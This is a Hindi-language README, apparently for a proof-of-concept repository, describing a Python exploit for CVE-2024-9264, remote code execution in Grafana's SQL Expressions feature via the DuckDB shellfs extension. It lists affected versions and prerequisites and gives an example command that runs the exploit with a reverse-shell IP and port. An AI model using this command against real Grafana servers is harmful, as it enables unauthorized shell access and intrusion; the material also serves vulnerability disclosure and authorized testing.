
CVE-2024-9264 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो SQL एक्सप्रेशन के माध्यम से Grafana में रिमोट कोड एक्जीक्यूशन प्राप्त करता है। इसके लिए प्रमाणित दर्शक पहुंच और DuckDB बाइनरी की आवश्यकता होती है।
ग्राफाना (CVE-2024-9264) में रिमोट कोड निष्पादन के लिए प्रूफ ऑफ कॉन्सेप्ट
इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो ग्राफाना के SQL एक्सप्रेशन सुविधा में रिमोट कोड निष्पादन (RCE) कमजोरी का शोषण करती है। अपर्याप्त इनपुट स्वच्छता का लाभ उठाकर, यह शोषण एक हमलावर को सर्वर पर मनमाने शेल कमांड निष्पादित करने की अनुमति देता है। यह shellfs कम्युनिटी एक्सटेंशन के माध्यम से संभव है, जिसे एक हमलावर द्वारा स्थापित और लोड किया जा सकता है ताकि कमांड निष्पादन की सुविधा हो सके।
Viewer अनुमतियाँ या उच्चतर होंग्राफाना >= v11.0.0 (सभी v11.x.y प्रभावित हैं)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
यह स्क्रिप्ट शैक्षिक उद्देश्यों और नियंत्रित वातावरणों में उपयोग के लिए है जहां आपके पास सिस्टम की सुरक्षा का परीक्षण करने की अनुमति है। इस उपकरण के दुरुपयोग से कानूनी परिणाम हो सकते हैं।